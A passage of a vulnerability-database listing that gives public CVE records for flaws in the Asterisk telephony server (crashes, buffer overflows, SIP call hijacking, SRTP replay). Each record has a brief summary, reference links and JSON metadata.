          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2014-005.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2014-4045",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "The Publish/Subscribe Framework in the PJSIP channel driver in Asterisk Open Source 12.x before 12.3.1, when sub_min_expiry is set to zero, allows remote attackers to cause a denial of service (assertion failure and crash) via an unsubscribe request when not subscribed to the device."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "20140612 AST-2014-005: Remote Crash in PJSIP Channel Driver\u0027s Publish/Subscribe Framework",
              "refsource": "BUGTRAQ",
              "url": "http://www.securityfocus.com/archive/1/532414/100/0/threaded"
            },
            {
              "name": "http://packetstormsecurity.com/files/127087/Asterisk-Project-Security-Advisory-AST-2014-005.html",
              "refsource": "MISC",
              "url": "http://packetstormsecurity.com/files/127087/Asterisk-Project-Security-Advisory-AST-2014-005.html"
            },
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2014-005.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2014-005.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2014-4045",
    "datePublished": "2014-06-17T14:00:00",
    "dateReserved": "2014-06-12T00:00:00",
    "dateUpdated": "2024-08-06T11:04:28.408Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2019-18790

Vulnerability from cvelistv5

Published

2019-11-22 16:22

Modified

2024-08-05 02:02

Severity ?

Summary

An issue was discovered in channels/chan_sip.c in Sangoma Asterisk 13.x before 13.29.2, 16.x before 16.6.2, and 17.x before 17.0.1, and Certified Asterisk 13.21 before cert5. A SIP request can be sent to Asterisk that can change a SIP peer's IP address. A REGISTER does not need to occur, and calls can be hijacked as a result. The only thing that needs to be known is the peer's name; authentication details such as passwords do not need to be known. This vulnerability is only exploitable when the nat option is set to the default, or auto_force_rport.

References

▼	URL	Tags
	https://www.asterisk.org/downloads/security-advisories	x_refsource_MISC
	http://downloads.asterisk.org/pub/security/AST-2019-006.html	x_refsource_MISC
	https://lists.debian.org/debian-lts-announce/2019/11/msg00038.html	mailing-list, x_refsource_MLIST
	https://lists.debian.org/debian-lts-announce/2022/04/msg00001.html	mailing-list, x_refsource_MLIST

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T02:02:38.262Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.asterisk.org/downloads/security-advisories"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2019-006.html"
          },
          {
            "name": "[debian-lts-announce] 20191130 [SECURITY] [DLA 2017-1] asterisk security update",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00038.html"
          },
          {
            "name": "[debian-lts-announce] 20220403 [SECURITY] [DLA 2969-1] asterisk security update",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "An issue was discovered in channels/chan_sip.c in Sangoma Asterisk 13.x before 13.29.2, 16.x before 16.6.2, and 17.x before 17.0.1, and Certified Asterisk 13.21 before cert5. A SIP request can be sent to Asterisk that can change a SIP peer\u0027s IP address. A REGISTER does not need to occur, and calls can be hijacked as a result. The only thing that needs to be known is the peer\u0027s name; authentication details such as passwords do not need to be known. This vulnerability is only exploitable when the nat option is set to the default, or auto_force_rport."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-04-03T07:06:08",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.asterisk.org/downloads/security-advisories"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2019-006.html"
        },
        {
          "name": "[debian-lts-announce] 20191130 [SECURITY] [DLA 2017-1] asterisk security update",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00038.html"
        },
        {
          "name": "[debian-lts-announce] 20220403 [SECURITY] [DLA 2969-1] asterisk security update",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00001.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2019-18790",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "An issue was discovered in channels/chan_sip.c in Sangoma Asterisk 13.x before 13.29.2, 16.x before 16.6.2, and 17.x before 17.0.1, and Certified Asterisk 13.21 before cert5. A SIP request can be sent to Asterisk that can change a SIP peer\u0027s IP address. A REGISTER does not need to occur, and calls can be hijacked as a result. The only thing that needs to be known is the peer\u0027s name; authentication details such as passwords do not need to be known. This vulnerability is only exploitable when the nat option is set to the default, or auto_force_rport."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.asterisk.org/downloads/security-advisories",
              "refsource": "MISC",
              "url": "https://www.asterisk.org/downloads/security-advisories"
            },
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2019-006.html",
              "refsource": "MISC",
              "url": "http://downloads.asterisk.org/pub/security/AST-2019-006.html"
            },
            {
              "name": "[debian-lts-announce] 20191130 [SECURITY] [DLA 2017-1] asterisk security update",
              "refsource": "MLIST",
              "url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00038.html"
            },
            {
              "name": "[debian-lts-announce] 20220403 [SECURITY] [DLA 2969-1] asterisk security update",
              "refsource": "MLIST",
              "url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00001.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2019-18790",
    "datePublished": "2019-11-22T16:22:55",
    "dateReserved": "2019-11-06T00:00:00",
    "dateUpdated": "2024-08-05T02:02:38.262Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2006-4345

Vulnerability from cvelistv5

Published

2006-08-24 20:00

Modified

2024-08-07 19:06

Severity ?

Summary

Stack-based buffer overflow in channels/chan_mgcp.c in MGCP in Asterisk 1.0 through 1.2.10 allows remote attackers to execute arbitrary code via a crafted audit endpoint (AUEP) response.

References

▼	URL	Tags
	http://www.vupen.com/english/advisories/2006/3372	vdb-entry, x_refsource_VUPEN
	http://www.gentoo.org/security/en/glsa/glsa-200610-15.xml	vendor-advisory, x_refsource_GENTOO
	http://labs.musecurity.com/advisories/MU-200608-01.txt	x_refsource_MISC
	http://secunia.com/advisories/22651	third-party-advisory, x_refsource_SECUNIA
	http://www.securityfocus.com/bid/19683	vdb-entry, x_refsource_BID
	http://securitytracker.com/id?1016742	vdb-entry, x_refsource_SECTRACK
	http://www.securityfocus.com/archive/1/444322/100/0/threaded	mailing-list, x_refsource_BUGTRAQ
	http://ftp.digium.com/pub/asterisk/ChangeLog-1.2.11	x_refsource_CONFIRM
	https://exchange.xforce.ibmcloud.com/vulnerabilities/28542	vdb-entry, x_refsource_XF
	http://www.sineapps.com/news.php?rssid=1448	x_refsource_CONFIRM
	http://secunia.com/advisories/21600	third-party-advisory, x_refsource_SECUNIA

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T19:06:07.392Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "ADV-2006-3372",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2006/3372"
          },
          {
            "name": "GLSA-200610-15",
            "tags": [
              "vendor-advisory",
              "x_refsource_GENTOO",
              "x_transferred"
            ],
            "url": "http://www.gentoo.org/security/en/glsa/glsa-200610-15.xml"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://labs.musecurity.com/advisories/MU-200608-01.txt"
          },
          {
            "name": "22651",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/22651"
          },
          {
            "name": "19683",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/19683"
          },
          {
            "name": "1016742",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://securitytracker.com/id?1016742"
          },
          {
            "name": "20060825 Multiple Vulnerabilities in Asterisk 1.2.10 (Fixed in 1.2.11)",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/444322/100/0/threaded"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://ftp.digium.com/pub/asterisk/ChangeLog-1.2.11"
          },
          {
            "name": "asterisk-mgcp-bo(28542)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/28542"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://www.sineapps.com/news.php?rssid=1448"
          },
          {
            "name": "21600",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/21600"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2006-08-23T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Stack-based buffer overflow in channels/chan_mgcp.c in MGCP in Asterisk 1.0 through 1.2.10 allows remote attackers to execute arbitrary code via a crafted audit endpoint (AUEP) response."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-10-17T20:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "ADV-2006-3372",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2006/3372"
        },
        {
          "name": "GLSA-200610-15",
          "tags": [
            "vendor-advisory",
            "x_refsource_GENTOO"
          ],
          "url": "http://www.gentoo.org/security/en/glsa/glsa-200610-15.xml"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://labs.musecurity.com/advisories/MU-200608-01.txt"
        },
        {
          "name": "22651",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/22651"
        },
        {
          "name": "19683",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/19683"
        },
        {
          "name": "1016742",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://securitytracker.com/id?1016742"
        },
        {
          "name": "20060825 Multiple Vulnerabilities in Asterisk 1.2.10 (Fixed in 1.2.11)",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/444322/100/0/threaded"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://ftp.digium.com/pub/asterisk/ChangeLog-1.2.11"
        },
        {
          "name": "asterisk-mgcp-bo(28542)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/28542"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://www.sineapps.com/news.php?rssid=1448"
        },
        {
          "name": "21600",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/21600"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2006-4345",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Stack-based buffer overflow in channels/chan_mgcp.c in MGCP in Asterisk 1.0 through 1.2.10 allows remote attackers to execute arbitrary code via a crafted audit endpoint (AUEP) response."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "ADV-2006-3372",
              "refsource": "VUPEN",
              "url": "http://www.vupen.com/english/advisories/2006/3372"
            },
            {
              "name": "GLSA-200610-15",
              "refsource": "GENTOO",
              "url": "http://www.gentoo.org/security/en/glsa/glsa-200610-15.xml"
            },
            {
              "name": "http://labs.musecurity.com/advisories/MU-200608-01.txt",
              "refsource": "MISC",
              "url": "http://labs.musecurity.com/advisories/MU-200608-01.txt"
            },
            {
              "name": "22651",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/22651"
            },
            {
              "name": "19683",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/19683"
            },
            {
              "name": "1016742",
              "refsource": "SECTRACK",
              "url": "http://securitytracker.com/id?1016742"
            },
            {
              "name": "20060825 Multiple Vulnerabilities in Asterisk 1.2.10 (Fixed in 1.2.11)",
              "refsource": "BUGTRAQ",
              "url": "http://www.securityfocus.com/archive/1/444322/100/0/threaded"
            },
            {
              "name": "http://ftp.digium.com/pub/asterisk/ChangeLog-1.2.11",
              "refsource": "CONFIRM",
              "url": "http://ftp.digium.com/pub/asterisk/ChangeLog-1.2.11"
            },
            {
              "name": "asterisk-mgcp-bo(28542)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/28542"
            },
            {
              "name": "http://www.sineapps.com/news.php?rssid=1448",
              "refsource": "CONFIRM",
              "url": "http://www.sineapps.com/news.php?rssid=1448"
            },
            {
              "name": "21600",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/21600"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2006-4345",
    "datePublished": "2006-08-24T20:00:00",
    "dateReserved": "2006-08-24T00:00:00",
    "dateUpdated": "2024-08-07T19:06:07.392Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2021-26712

Vulnerability from cvelistv5

Published

2021-02-18 20:10

Modified

2024-08-03 20:33

Severity ?

Summary

Incorrect access controls in res_srtp.c in Sangoma Asterisk 13.38.1, 16.16.0, 17.9.1, and 18.2.0 and Certified Asterisk 16.8-cert5 allow a remote unauthenticated attacker to prematurely terminate secure calls by replaying SRTP packets.

References

▼	URL	Tags
	https://downloads.asterisk.org/pub/security/	x_refsource_MISC
	http://seclists.org/fulldisclosure/2021/Feb/59	mailing-list, x_refsource_FULLDISC
	https://downloads.asterisk.org/pub/security/AST-2021-003.html	x_refsource_CONFIRM
	https://issues.asterisk.org/jira/browse/ASTERISK-29260	x_refsource_CONFIRM
	http://packetstormsecurity.com/files/161473/Asterisk-Project-Security-Advisory-AST-2021-003.html	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T20:33:40.803Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://downloads.asterisk.org/pub/security/"
          },
          {
            "name": "20210218 AST-2021-003: Remote attacker could prematurely tear down SRTP calls",
            "tags": [
              "mailing-list",
              "x_refsource_FULLDISC",
              "x_transferred"
            ],
            "url": "http://seclists.org/fulldisclosure/2021/Feb/59"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://downloads.asterisk.org/pub/security/AST-2021-003.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29260"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/161473/Asterisk-Project-Security-Advisory-AST-2021-003.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Incorrect access controls in res_srtp.c in Sangoma Asterisk 13.38.1, 16.16.0, 17.9.1, and 18.2.0 and Certified Asterisk 16.8-cert5 allow a remote unauthenticated attacker to prematurely terminate secure calls by replaying SRTP packets."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2021-02-19T15:06:09",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://downloads.asterisk.org/pub/security/"
        },
        {
          "name": "20210218 AST-2021-003: Remote attacker could prematurely tear down SRTP calls",
          "tags": [
            "mailing-list",
            "x_refsource_FULLDISC"
          ],
          "url": "http://seclists.org/fulldisclosure/2021/Feb/59"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://downloads.asterisk.org/pub/security/AST-2021-003.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29260"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://packetstormsecurity.com/files/161473/Asterisk-Project-Security-Advisory-AST-2021-003.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2021-26712",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Incorrect access controls in res_srtp.c in Sangoma Asterisk 13.38.1, 16.16.0, 17.9.1, and 18.2.0 and Certified Asterisk 16.8-cert5 allow a remote unauthenticated attacker to prematurely terminate secure calls by replaying SRTP packets."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://downloads.asterisk.org/pub/security/",
              "refsource": "MISC",
              "url": "https://downloads.asterisk.org/pub/security/"
            },
            {
              "name": "20210218 AST-2021-003: Remote attacker could prematurely tear down SRTP calls",
              "refsource": "FULLDISC",
              "url": "http://seclists.org/fulldisclosure/2021/Feb/59"
            },
            {
              "name": "https://downloads.asterisk.org/pub/security/AST-2021-003.html",
              "refsource": "CONFIRM",
              "url": "https://downloads.asterisk.org/pub/security/AST-2021-003.html"
            },
            {
              "name": "https://issues.asterisk.org/jira/browse/ASTERISK-29260",
              "refsource": "CONFIRM",
              "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29260"
            },
            {
              "name": "http://packetstormsecurity.com/files/161473/Asterisk-Project-Security-Advisory-AST-2021-003.html",
              "refsource": "MISC",
              "url": "http://packetstormsecurity.com/files/161473/Asterisk-Project-Security-Advisory-AST-2021-003.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2021-26712",
    "datePublished": "2021-02-18T20:10:20",
    "dateReserved": "2021-02-05T00:00:00",
    "dateUpdated": "2024-08-03T20:33:40.803Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2012-1184

Vulnerability from cvelistv5

Published

2012-09-18 18:00

Modified

2024-08-06 18:53

Severity ?

Summary

Stack-based buffer overflow in the ast_parse_digest function in main/utils.c in Asterisk 1.8.x before 1.8.10.1 and 10.x before 10.2.1 allows remote attackers to cause a denial of service (crash) or possibly execute arbitrary code via a long string in an HTTP Digest Authentication header.

References

▼	URL	Tags
	http://www.openwall.com/lists/oss-security/2012/03/16/17	mailing-list, x_refsource_MLIST
	http://downloads.asterisk.org/pub/security/AST-2012-003.pdf	x_refsource_CONFIRM
	http://www.asterisk.org/node/51797	x_refsource_CONFIRM
	http://secunia.com/advisories/48417	third-party-advisory, x_refsource_SECUNIA
	http://www.openwall.com/lists/oss-security/2012/03/16/10	mailing-list, x_refsource_MLIST
	http://downloads.asterisk.org/pub/security/AST-2012-003-1.8.diff	x_refsource_CONFIRM
	http://osvdb.org/80126	vdb-entry, x_refsource_OSVDB
	http://www.securitytracker.com/id?1026813	vdb-entry, x_refsource_SECTRACK
	https://exchange.xforce.ibmcloud.com/vulnerabilities/74083	vdb-entry, x_refsource_XF

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T18:53:35.690Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "[oss-security] 20120316 Re: CVE Request -- Asterisk: AST-2012-002 and AST-2012-003  flaws",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2012/03/16/17"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2012-003.pdf"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://www.asterisk.org/node/51797"
          },
          {
            "name": "48417",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/48417"
          },
          {
            "name": "[oss-security] 20120316 CVE Request -- Asterisk: AST-2012-002 and AST-2012-003  flaws",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2012/03/16/10"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2012-003-1.8.diff"
          },
          {
            "name": "80126",
            "tags": [
              "vdb-entry",
              "x_refsource_OSVDB",
              "x_transferred"
            ],
            "url": "http://osvdb.org/80126"
          },
          {
            "name": "1026813",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id?1026813"
          },
          {
            "name": "asterisk-astparsedigest-bo(74083)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/74083"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2012-03-15T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Stack-based buffer overflow in the ast_parse_digest function in main/utils.c in Asterisk 1.8.x before 1.8.10.1 and 10.x before 10.2.1 allows remote attackers to cause a denial of service (crash) or possibly execute arbitrary code via a long string in an HTTP Digest Authentication header."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-08-28T12:57:01",
        "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
        "shortName": "redhat"
      },
      "references": [
        {
          "name": "[oss-security] 20120316 Re: CVE Request -- Asterisk: AST-2012-002 and AST-2012-003  flaws",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "http://www.openwall.com/lists/oss-security/2012/03/16/17"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2012-003.pdf"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://www.asterisk.org/node/51797"
        },
        {
          "name": "48417",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/48417"
        },
        {
          "name": "[oss-security] 20120316 CVE Request -- Asterisk: AST-2012-002 and AST-2012-003  flaws",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "http://www.openwall.com/lists/oss-security/2012/03/16/10"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2012-003-1.8.diff"
        },
        {
          "name": "80126",
          "tags": [
            "vdb-entry",
            "x_refsource_OSVDB"
          ],
          "url": "http://osvdb.org/80126"
        },
        {
          "name": "1026813",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id?1026813"
        },
        {
          "name": "asterisk-astparsedigest-bo(74083)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/74083"
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
    "assignerShortName": "redhat",
    "cveId": "CVE-2012-1184",
    "datePublished": "2012-09-18T18:00:00",
    "dateReserved": "2012-02-14T00:00:00",
    "dateUpdated": "2024-08-06T18:53:35.690Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2011-4598

Vulnerability from cvelistv5

Published

2011-12-15 02:00

Modified

2024-08-07 00:09

Severity ?

Summary

The handle_request_info function in channels/chan_sip.c in Asterisk Open Source 1.6.2.x before 1.6.2.21 and 1.8.x before 1.8.7.2, when automon is enabled, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a crafted sequence of SIP requests.

References

▼	URL	Tags
	http://openwall.com/lists/oss-security/2011/12/09/4	mailing-list, x_refsource_MLIST
	http://openwall.com/lists/oss-security/2011/12/09/3	mailing-list, x_refsource_MLIST
